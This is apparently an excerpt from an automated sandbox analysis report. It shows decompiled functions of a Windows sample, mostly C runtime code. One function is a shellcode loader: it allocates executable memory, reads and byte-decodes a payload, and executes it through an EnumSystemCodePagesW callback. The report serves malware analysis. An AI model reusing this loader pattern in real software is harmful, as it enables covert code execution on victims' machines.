                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                        • String ID:
                                                        • API String ID: 1559183368-0
                                                        • Opcode ID: d285b6dd1113a55ae780a990317947fbbdadd265687160ebd386bed1a57fb8fe
                                                        • Instruction ID: acacb248b804a03453a91d40d44469e5890e7d70ccea0f1c8cc7e2e41a98c018
                                                        • Opcode Fuzzy Hash: d285b6dd1113a55ae780a990317947fbbdadd265687160ebd386bed1a57fb8fe
                                                        • Instruction Fuzzy Hash: 2751EA70A013099BDB248F6DE8E05EE7BB5AF40328F148729EB29D6ED0F77499508B41
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B1000 Relevance: 7.6, APIs: 5, Instructions: 54memoryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        C-Code - Quality: 92%
                                                        			E013B1000(void* __ecx, void* __eflags, intOrPtr _a12) {
				intOrPtr _v8;
				void* __ebx;
				void* __edi;
				intOrPtr _t6;
				void* _t7;
				_Unknown_base(*)()* _t8;
				void* _t18;
				_Unknown_base(*)()* _t19;
				void* _t24;
				void* _t25;
				void* _t26;
				intOrPtr* _t32;

				_push(_t18);
				_t26 = 0; // executed
				_t6 = E013B1147(_t18, _t24, 0, 0x17d78400); // executed
				 *_t32 = 0x13c3000;
				_v8 = _t6;
				_t7 = E013B11D9(_a12, _t25); // executed
				_t8 = VirtualAlloc(0, 0x1487, 0x3000, 0x40); // executed
				_t19 = _t8;
				E013B147D(_t19, 0x1487, 1, _t7); // executed
				_t10 = _v8;
				if(_v8 != 0) {
					E013B1530(_t10, 0xcb, 0x17d78400);
					do {
						 *((char*)(_t19 + _t26)) = ( *((intOrPtr*)(_t19 + _t26)) + 0x00000001 ^ 0x000000dd) - 0x3b;
						_t26 = _t26 + 1;
					} while (_t26 < 0x1487);
					EnumSystemCodePagesW(_t19, 0); // executed
				}
				return 0;
			}















                                                        0x013b1004
                                                        0x013b100c
                                                        0x013b100e
                                                        0x013b1013
                                                        0x013b101d
                                                        0x013b1020
                                                        0x013b1036
                                                        0x013b1044
                                                        0x013b1048
                                                        0x013b104d
                                                        0x013b1055
                                                        0x013b1062
                                                        0x013b106a
                                                        0x013b1073
                                                        0x013b1076
                                                        0x013b1077
                                                        0x013b107e
                                                        0x013b107e
                                                        0x013b108a

                                                        APIs
                                                        • _malloc.LIBCMT ref: 013B100E
                                                          • Part of subcall function 013B1147: __FF_MSGBANNER.LIBCMT ref: 013B115E
                                                          • Part of subcall function 013B1147: __NMSG_WRITE.LIBCMT ref: 013B1165
                                                          • Part of subcall function 013B1147: RtlAllocateHeap.NTDLL(00800000,00000000,00000001,00000000,00000000,00000000,?,013B48C7,00000000,00000000,00000000,00000000,?,013B44F9,00000018,013C2280), ref: 013B118A
                                                          • Part of subcall function 013B11D9: __wfsopen.LIBCMT ref: 013B11E4
                                                        • VirtualAlloc.KERNELBASE(00000000,00001487,00003000,00000040), ref: 013B1036
                                                        • __fread_nolock.LIBCMT ref: 013B1048
                                                        • _memset.LIBCMT ref: 013B1062
                                                        • EnumSystemCodePagesW.KERNELBASE(00000000,00000000), ref: 013B107E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: AllocAllocateCodeEnumHeapPagesSystemVirtual__fread_nolock__wfsopen_malloc_memset
                                                        • String ID:
                                                        • API String ID: 3693343133-0
                                                        • Opcode ID: e970ffc898febc9680fec2f7fe5dc0a3a1cd131c7bfdfc0643763fde97308cae
                                                        • Instruction ID: d33b299ec09634e5aaa5e3fabe5523ab3d0286d94cd664b55446cccf0118649c
                                                        • Opcode Fuzzy Hash: e970ffc898febc9680fec2f7fe5dc0a3a1cd131c7bfdfc0643763fde97308cae
                                                        • Instruction Fuzzy Hash: 370126726043447BF7212A7AAC9BFDF3F5CDB51B5CF100865FB02AA581F9A498019274
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B1498 Relevance: 3.0, APIs: 2, Instructions: 42COMMONLIBRARYCODE
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 234 13b1498-13b14ac call 13b2400 237 13b14df 234->237 238 13b14ae-13b14b1 234->238 240 13b14e1-13b14e6 call 13b2445 237->240 238->237 239 13b14b3-13b14b8 238->239 241 13b14ba-13b14be 239->241 242 13b14e7-13b14fe call 13b1f5e call 13b12b8 239->242 245 13b14cf-13b14da call 13b1cc3 call 13b1e89 241->245 246 13b14c0-13b14cc call 13b1530 241->246 254 13b1503-13b1519 call 13b1521 242->254 245->237 246->245 254->240
                                                        C-Code - Quality: 89%
                                                        			E013B1498(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t16;
				intOrPtr _t19;
				intOrPtr _t29;
				void* _t32;

				_push(0xc);
				_push(0x13c2170);
				E013B2400(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t32 - 0x1c)) = 0;
				if( *((intOrPtr*)(_t32 + 0x10)) == 0 ||  *((intOrPtr*)(_t32 + 0x14)) == 0) {
					L6:
					_t16 = 0;
				} else {
					_t31 =  *((intOrPtr*)(_t32 + 0x18));
					if( *((intOrPtr*)(_t32 + 0x18)) != 0) {
						E013B1F5E(_t31);
						 *((intOrPtr*)(_t32 - 4)) = 0;
						_t19 = E013B12B8( *((intOrPtr*)(_t32 + 8)),  *((intOrPtr*)(_t32 + 0xc)),  *((intOrPtr*)(_t32 + 0x10)),  *((intOrPtr*)(_t32 + 0x14)), _t31); // executed
						_t29 = _t19;
						 *((intOrPtr*)(_t32 - 0x1c)) = _t29;
						 *((intOrPtr*)(_t32 - 4)) = 0xfffffffe;
						E013B1521(_t31);
						_t16 = _t29;
					} else {
						if( *((intOrPtr*)(_t32 + 0xc)) != 0xffffffff) {
							E013B1530( *((intOrPtr*)(_t32 + 8)), 0,  *((intOrPtr*)(_t32 + 0xc)));
						}
						 *((intOrPtr*)(E013B1CC3())) = 0x16;
						E013B1E89();
						goto L6;
					}
				}
				return E013B2445(_t16);
			}







                                                        0x013b1498
                                                        0x013b149a
                                                        0x013b149f
                                                        0x013b14a6
                                                        0x013b14ac
                                                        0x013b14df
                                                        0x013b14df
                                                        0x013b14b3
                                                        0x013b14b3
                                                        0x013b14b8
                                                        0x013b14e8
                                                        0x013b14ee
                                                        0x013b14fe
                                                        0x013b1506
                                                        0x013b1508
                                                        0x013b150b
                                                        0x013b1512
                                                        0x013b1517
                                                        0x013b14ba
                                                        0x013b14be
                                                        0x013b14c7
                                                        0x013b14cc
                                                        0x013b14d4
                                                        0x013b14da
                                                        0x00000000
                                                        0x013b14da
                                                        0x013b14b8
                                                        0x013b14e6

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __lock_file_memset
                                                        • String ID:
                                                        • API String ID: 26237723-0
                                                        • Opcode ID: 6f8065497089b3ada01df9150b9e27fbdab7ef0b7031397e28f6f65260da8c35
                                                        • Instruction ID: 5205364ee4fcf7023bf3186f6ae3dd705cb9b0401d3d017c318f8eeaab77d866
                                                        • Opcode Fuzzy Hash: 6f8065497089b3ada01df9150b9e27fbdab7ef0b7031397e28f6f65260da8c35
                                                        • Instruction Fuzzy Hash: 7C01887180020AEBCF21AFADBC504DF7F71AF90728F144215EB1866950F7758A11DF91
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B11D9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 327 13b11d9-13b11ed call 13b11ee
                                                        C-Code - Quality: 25%
                                                        			E013B11D9(intOrPtr _a4, intOrPtr _a8) {
				void* __ebp;
				void* _t3;
				void* _t4;
				void* _t5;
				void* _t6;
				void* _t9;

				_push(0x40);
				_push(_a8);
				_push(_a4);
				_t3 = E013B11EE(_t4, _t5, _t6, _t9); // executed
				return _t3;
			}









                                                        0x013b11dc
                                                        0x013b11de
                                                        0x013b11e1
                                                        0x013b11e4
                                                        0x013b11ed

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: __wfsopen
                                                        • String ID:
                                                        • API String ID: 197181222-0
                                                        • Opcode ID: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction ID: 08ed1a97a1e799ba619fac02dc7a86af1dcdbc11624d2e39632d5bd9d2188f94
                                                        • Opcode Fuzzy Hash: 6ddf6e1ab81d7b85eaff3423c11cf18e9f26fa56f97d638f5b10e7f164e3c6f3
                                                        • Instruction Fuzzy Hash: 62B0927254120C77CE112AC6EC02A893B199B50664F008020FB0C18960A673A6609689
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Non-executed Functions

                                                        Function 013B43CC Relevance: 3.0, APIs: 2, Instructions: 8COMMONLIBRARYCODE
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E013B43CC(struct _EXCEPTION_POINTERS* _a4) {

				SetUnhandledExceptionFilter(0);
				return UnhandledExceptionFilter(_a4);
			}



                                                        0x013b43d1
                                                        0x013b43e1

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 013B43D1
                                                        • UnhandledExceptionFilter.KERNEL32(?), ref: 013B43DA
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: 5b9c0a738ab1ab09926d7a426fad7f59261a5e3933b82d899e635a646c12db66
                                                        • Instruction ID: afafde0d2f0fd561e882fa020043f61e94ddf7aeeeb6fe85f92d4f215447bba8
                                                        • Opcode Fuzzy Hash: 5b9c0a738ab1ab09926d7a426fad7f59261a5e3933b82d899e635a646c12db66
                                                        • Instruction Fuzzy Hash: 14B09235044208ABCB102B9AE88DBC83F2CEB14753F100420F70E44056EB6254108B92
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B439B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E013B439B(_Unknown_base(*)()* _a4) {

				return SetUnhandledExceptionFilter(_a4);
			}



                                                        0x013b43a8

                                                        APIs
                                                        • SetUnhandledExceptionFilter.KERNEL32 ref: 013B43A1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: ExceptionFilterUnhandled
                                                        • String ID:
                                                        • API String ID: 3192549508-0
                                                        • Opcode ID: eb0735900ec16b4948008573bf810dea2ff35a60c0ee1d6dcb987e3655a38303
                                                        • Instruction ID: fad76ee31edde4b45b1951a771a8243df1107a2e695a3c4ca93def39566f9de9
                                                        • Opcode Fuzzy Hash: eb0735900ec16b4948008573bf810dea2ff35a60c0ee1d6dcb987e3655a38303
                                                        • Instruction Fuzzy Hash: E5A0113000020CABCA002A8AE8888C83F2CEA002A2B000020FA0C00022EB22A8208A82
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B1D17 Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E013B1D17() {
				void* _t3;

				_t3 = GetProcessHeap();
				 *0x13c4834 = _t3;
				return 0 | _t3 != 0x00000000;
			}




                                                        0x013b1d17
                                                        0x013b1d1f
                                                        0x013b1d2b

                                                        APIs
                                                        • GetProcessHeap.KERNEL32(013B1629,013C2190,00000014), ref: 013B1D17
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983533144.00000000013B1000.00000020.00000001.01000000.00000005.sdmp, Offset: 013B0000, based on PE: true
                                                        • Associated: 00000005.00000002.983529361.00000000013B0000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983545056.00000000013BE000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983553202.00000000013C3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                        • Associated: 00000005.00000002.983563219.00000000013C7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_13b0000_yldnat.jbxd
                                                        Similarity
                                                        • API ID: HeapProcess
                                                        • String ID:
                                                        • API String ID: 54951025-0
                                                        • Opcode ID: ea194f36308a7be998ed5b581dbee86df8bc5e8fe528f464d675619cec3bfe07
                                                        • Instruction ID: 50578eead6f183e300877bff4ac25a44c0b053f9ed5ba20402d0964281b76953
                                                        • Opcode Fuzzy Hash: ea194f36308a7be998ed5b581dbee86df8bc5e8fe528f464d675619cec3bfe07
                                                        • Instruction Fuzzy Hash: FAB012B03032024BC7180B3D75A414A39DC6708301704003D7107C1188FF20C410DB01
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00110A41 Relevance: .3, Instructions: 336COMMON
                                                        Download Yara Rule
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.983374301.0000000000110000.00000040.00001000.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_110000_yldnat.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4bee78ce192f1e0359bd16443b34b42dcf04ebaf259c185fd8bd1d79e4b24057
                                                        • Instruction ID: 1d8a7687d2d980c93af267717f2eade03ba97f4240c287792347ea03cabc4e46
                                                        • Opcode Fuzzy Hash: 4bee78ce192f1e0359bd16443b34b42dcf04ebaf259c185fd8bd1d79e4b24057
                                                        • Instruction Fuzzy Hash: 27F1015085D2E9ADDB06CBFD45643FCBFB05E26102F0845DAE0E5E6283C53A938EDB25
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 013B38A8 Relevance: 12.2, APIs: 8, Instructions: 229COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 86%
                                                        			E013B38A8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t82;
				signed int _t86;
				long _t90;
				void* _t91;
				signed int _t94;
				signed int _t98;
				signed int _t99;
				signed char _t103;
				signed int _t105;
				intOrPtr _t106;
				intOrPtr* _t109;
				signed char _t111;
				long _t119;
				intOrPtr _t129;
				signed int _t133;
				void* _t135;
				signed int _t138;
				void** _t139;
				signed int _t141;
				signed int _t142;
				signed int _t143;
				signed int _t147;
				signed int _t149;
				void* _t150;
				signed int _t154;
				void* _t155;
				void* _t156;

				_push(0x64);
				_push(0x13c2260);
				E013B2400(__ebx, __edi, __esi);
				E013B442F(0xb);
				 *((intOrPtr*)(_t155 - 4)) = 0;
				_push(0x40);
				_t141 = 0x20;
				_push(_t141);
				_t82 = E013B4869();
				_t133 = _t82;
				 *(_t155 - 0x24) = _t133;
				if(_t133 != 0) {
					 *0x13c4848 = _t82;
					 *0x13c50e4 = _t141;
					while(1) {
						__eflags = _t133 - 0x800 + _t82;
						if(_t133 >= 0x800 + _t82) {
							break;
						}
						 *((short*)(_t133 + 4)) = 0xa00;
						 *_t133 =  *_t133 | 0xffffffff;
						 *((intOrPtr*)(_t133 + 8)) = 0;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x00000080;
						 *(_t133 + 0x24) =  *(_t133 + 0x24) & 0x0000007f;
						 *((short*)(_t133 + 0x25)) = 0xa0a;
						 *((intOrPtr*)(_t133 + 0x38)) = 0;
						 *((char*)(_t133 + 0x34)) = 0;
						_t133 = _t133 + 0x40;
						 *(_t155 - 0x24) = _t133;
						_t82 =  *0x13c4848; // 0x82f258
					}
					GetStartupInfoW(_t155 - 0x74);
					__eflags =  *((short*)(_t155 - 0x42));
					if( *((short*)(_t155 - 0x42)) == 0) {
						L27:
						_t129 = 0xfffffffe;
						L28:
						_t142 = 0;
						__eflags = 0;
						while(1) {
							 *(_t155 - 0x2c) = _t142;
							__eflags = _t142 - 3;
							if(_t142 >= 3) {
								break;
							}
							_t147 = (_t142 << 6) +  *0x13c4848;
							 *(_t155 - 0x24) = _t147;
							__eflags =  *_t147 - 0xffffffff;
							if( *_t147 == 0xffffffff) {
								L33:
								 *(_t147 + 4) = 0x81;
								__eflags = _t142;
								if(_t142 != 0) {
									_t65 = _t142 - 1; // -1
									asm("sbb eax, eax");
									_t90 =  ~_t65 + 0xfffffff5;
									__eflags = _t90;
								} else {
									_t90 = 0xfffffff6;
								}
								_t91 = GetStdHandle(_t90);
								 *(_t155 - 0x1c) = _t91;
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									L45:
									 *(_t147 + 4) =  *(_t147 + 4) | 0x00000040;
									 *_t147 = _t129;
									_t94 =  *0x13c6100;
									__eflags = _t94;
									if(_t94 != 0) {
										 *((intOrPtr*)( *((intOrPtr*)(_t94 + _t142 * 4)) + 0x10)) = _t129;
									}
									goto L47;
								} else {
									__eflags = _t91;
									if(_t91 == 0) {
										goto L45;
									}
									_t98 = GetFileType(_t91);
									__eflags = _t98;
									if(_t98 == 0) {
										goto L45;
									}
									 *_t147 =  *(_t155 - 0x1c);
									_t99 = _t98 & 0x000000ff;
									__eflags = _t99 - 2;
									if(_t99 != 2) {
										__eflags = _t99 - 3;
										if(_t99 != 3) {
											L44:
											_t71 = _t147 + 0xc; // -20727868
											E013B40A2(_t71, 0xfa0, 0);
											_t156 = _t156 + 0xc;
											 *((intOrPtr*)(_t147 + 8)) =  *((intOrPtr*)(_t147 + 8)) + 1;
											L47:
											_t142 = _t142 + 1;
											continue;
										}
										_t103 =  *(_t147 + 4) | 0x00000008;
										__eflags = _t103;
										L43:
										 *(_t147 + 4) = _t103;
										goto L44;
									}
									_t103 =  *(_t147 + 4) | 0x00000040;
									goto L43;
								}
							}
							__eflags =  *_t147 - _t129;
							if( *_t147 == _t129) {
								goto L33;
							}
							 *(_t147 + 4) =  *(_t147 + 4) | 0x00000080;
							goto L47;
						}
						 *((intOrPtr*)(_t155 - 4)) = _t129;
						E013B3B53();
						_t86 = 0;
						__eflags = 0;
						L49:
						return E013B2445(_t86);
					}
					_t105 =  *(_t155 - 0x40);
					__eflags = _t105;
					if(_t105 == 0) {
						goto L27;
					}
					_t135 =  *_t105;
					 *(_t155 - 0x1c) = _t135;
					_t106 = _t105 + 4;
					 *((intOrPtr*)(_t155 - 0x28)) = _t106;
					 *(_t155 - 0x20) = _t106 + _t135;
					__eflags = _t135 - 0x800;
					if(_t135 >= 0x800) {
						_t135 = 0x800;
						 *(_t155 - 0x1c) = 0x800;
					}
					_t149 = 1;
					__eflags = 1;
					 *(_t155 - 0x30) = 1;
					while(1) {
						__eflags =  *0x13c50e4 - _t135; // 0x20
						if(__eflags >= 0) {
							break;
						}
						_t138 = E013B4869(_t141, 0x40);
						 *(_t155 - 0x24) = _t138;
						__eflags = _t138;
						if(_t138 != 0) {
							0x13c4848[_t149] = _t138;
							 *0x13c50e4 =  *0x13c50e4 + _t141;
							__eflags =  *0x13c50e4;
							while(1) {
								__eflags = _t138 - 0x800 + 0x13c4848[_t149];
								if(_t138 >= 0x800 + 0x13c4848[_t149]) {
									break;
								}
								 *((short*)(_t138 + 4)) = 0xa00;
								 *_t138 =  *_t138 | 0xffffffff;
								 *((intOrPtr*)(_t138 + 8)) = 0;
								 *(_t138 + 0x24) =  *(_t138 + 0x24) & 0x00000080;
								 *((short*)(_t138 + 0x25)) = 0xa0a;
								 *((intOrPtr*)(_t138 + 0x38)) = 0;
								 *((char*)(_t138 + 0x34)) = 0;
								_t138 = _t138 + 0x40;
								 *(_t155 - 0x24) = _t138;
							}
							_t149 = _t149 + 1;
							 *(_t155 - 0x30) = _t149;
							_t135 =  *(_t155 - 0x1c);
							continue;
						}
						_t135 =  *0x13c50e4; // 0x20
						 *(_t155 - 0x1c) = _t135;
						break;
					}
					_t143 = 0;
					 *(_t155 - 0x2c) = 0;
					_t129 = 0xfffffffe;
					_t109 =  *((intOrPtr*)(_t155 - 0x28));
					_t139 =  *(_t155 - 0x20);
					while(1) {
						__eflags = _t143 - _t135;
						if(_t143 >= _t135) {
							goto L28;
						}
						_t150 =  *_t139;
						__eflags = _t150 - 0xffffffff;
						if(_t150 == 0xffffffff) {
							L22:
							_t143 = _t143 + 1;
							 *(_t155 - 0x2c) = _t143;
							_t109 =  *((intOrPtr*)(_t155 - 0x28)) + 1;
							 *((intOrPtr*)(_t155 - 0x28)) = _t109;
							_t139 =  &(_t139[1]);
							 *(_t155 - 0x20) = _t139;
							continue;
						}
						__eflags = _t150 - _t129;
						if(_t150 == _t129) {
							goto L22;
						}
						_t111 =  *_t109;
						__eflags = _t111 & 0x00000001;
						if((_t111 & 0x00000001) == 0) {
							goto L22;
						}
						__eflags = _t111 & 0x00000008;
						if((_t111 & 0x00000008) != 0) {
							L20:
							_t154 = ((_t143 & 0x0000001f) << 6) + 0x13c4848[_t143 >> 5];
							 *(_t155 - 0x24) = _t154;
							 *_t154 =  *_t139;
							 *((char*)(_t154 + 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t155 - 0x28))));
							_t37 = _t154 + 0xc; // 0xd
							E013B40A2(_t37, 0xfa0, 0);
							_t156 = _t156 + 0xc;
							_t38 = _t154 + 8;
							 *_t38 =  *(_t154 + 8) + 1;
							__eflags =  *_t38;
							_t139 =  *(_t155 - 0x20);
							L21:
							_t135 =  *(_t155 - 0x1c);
							goto L22;
						}
						_t119 = GetFileType(_t150);
						_t139 =  *(_t155 - 0x20);
						__eflags = _t119;
						if(_t119 == 0) {
							goto L21;
						}
						goto L20;
					}
					goto L28;
				}
				_t86 = E013B2600(_t155, 0x13c3400, _t155 - 0x10, 0xfffffffe) | 0xffffffff;
				goto L49;
			}






























                                                        0x013b38a8
                                                        0x013b38aa
                                                        0x013b38af
                                                        0x013b38b6
                                                        0x013b38be
                                                        0x013b38c1
                                                        0x013b38c5
                                                        0x013b38c6
                                                        0x013b38c7
                                                        0x013b38ce
                                                        0x013b38d0
                                                        0x013b38d5
                                                        0x013b38f2
                                                        0x013b38f7
                                                        0x013b38fd
                                                        0x013b3902
                                                        0x013b3904
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3906
                                                        0x013b390c
                                                        0x013b390f
                                                        0x013b3912
                                                        0x013b391b
                                                        0x013b391e
                                                        0x013b3924
                                                        0x013b3927
                                                        0x013b392a
                                                        0x013b392d
                                                        0x013b3930
                                                        0x013b3930
                                                        0x013b393b
                                                        0x013b3941
                                                        0x013b3946
                                                        0x013b3a7b
                                                        0x013b3a7d
                                                        0x013b3a7e
                                                        0x013b3a7e
                                                        0x013b3a7e
                                                        0x013b3a80
                                                        0x013b3a80
                                                        0x013b3a83
                                                        0x013b3a86
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3a91
                                                        0x013b3a97
                                                        0x013b3a9a
                                                        0x013b3a9d
                                                        0x013b3ab1
                                                        0x013b3ab1
                                                        0x013b3ab5
                                                        0x013b3ab7
                                                        0x013b3abe
                                                        0x013b3ac3
                                                        0x013b3ac5
                                                        0x013b3ac5
                                                        0x013b3ab9
                                                        0x013b3abb
                                                        0x013b3abb
                                                        0x013b3ac9
                                                        0x013b3acf
                                                        0x013b3ad2
                                                        0x013b3ad5
                                                        0x013b3b23
                                                        0x013b3b29
                                                        0x013b3b2c
                                                        0x013b3b2e
                                                        0x013b3b33
                                                        0x013b3b35
                                                        0x013b3b3a
                                                        0x013b3b3a
                                                        0x00000000
                                                        0x013b3ad7
                                                        0x013b3ad7
                                                        0x013b3ad9
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3adc
                                                        0x013b3ae2
                                                        0x013b3ae4
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3ae9
                                                        0x013b3aeb
                                                        0x013b3af0
                                                        0x013b3af3
                                                        0x013b3afd
                                                        0x013b3b00
                                                        0x013b3b0b
                                                        0x013b3b12
                                                        0x013b3b16
                                                        0x013b3b1b
                                                        0x013b3b1e
                                                        0x013b3b3d
                                                        0x013b3b3d
                                                        0x00000000
                                                        0x013b3b3d
                                                        0x013b3b06
                                                        0x013b3b06
                                                        0x013b3b08
                                                        0x013b3b08
                                                        0x00000000
                                                        0x013b3b08
                                                        0x013b3af9
                                                        0x00000000
                                                        0x013b3af9
                                                        0x013b3ad5
                                                        0x013b3a9f
                                                        0x013b3aa1
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3aa9
                                                        0x00000000
                                                        0x013b3aa9
                                                        0x013b3b43
                                                        0x013b3b46
                                                        0x013b3b4b
                                                        0x013b3b4b
                                                        0x013b3b4d
                                                        0x013b3b52
                                                        0x013b3b52
                                                        0x013b394c
                                                        0x013b394f
                                                        0x013b3951
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3957
                                                        0x013b3959
                                                        0x013b395c
                                                        0x013b395f
                                                        0x013b3964
                                                        0x013b396c
                                                        0x013b396e
                                                        0x013b3970
                                                        0x013b3972
                                                        0x013b3972
                                                        0x013b3977
                                                        0x013b3977
                                                        0x013b3978
                                                        0x013b397b
                                                        0x013b397b
                                                        0x013b3981
                                                        0x00000000
                                                        0x00000000
                                                        0x013b398d
                                                        0x013b398f
                                                        0x013b3992
                                                        0x013b3994
                                                        0x013b3a2e
                                                        0x013b3a35
                                                        0x013b3a35
                                                        0x013b3a3b
                                                        0x013b3a47
                                                        0x013b3a49
                                                        0x00000000
                                                        0x00000000
                                                        0x013b3a4b
                                                        0x013b3a51
                                                        0x013b3a54
                                                        0x013b3a57
                                                        0x013b3a5b
                                                        0x013b3a61
                                                        0x013b3a64
                                                        0x013b3a67
                                                        0x013b3a6a
                                                        0x013b3a6a
                                                        0x013b3a6f
                                                        0x013b3a70
                                                        0x013b3a73
                                                        0x00000000
                                                        0x013b3a73
                                                        0x013b399a
                                                        0x013b39a0
                                                        0x00000000
                                                        0x013b39a0
                                                        0x013b39a3
                                                        0x013b39a5
                                                        0x013b39aa
                                                        0x013b39ab
                                                        0x013b39ae
                                                        0x013b39b1
                                                        0x013b39b1
                                                        0x013b39b3
                                                        0x00000000
                                                        0x00000000
                                                        0x013b39b9
                                                        0x013b39bb
                                                        0x013b39be
                                                        0x013b3a1b
                                                        0x013b3a1b
                                                        0x013b3a1c
                                                        0x013b3a22
                                                        0x013b3a23
                                                        0x013b3a26
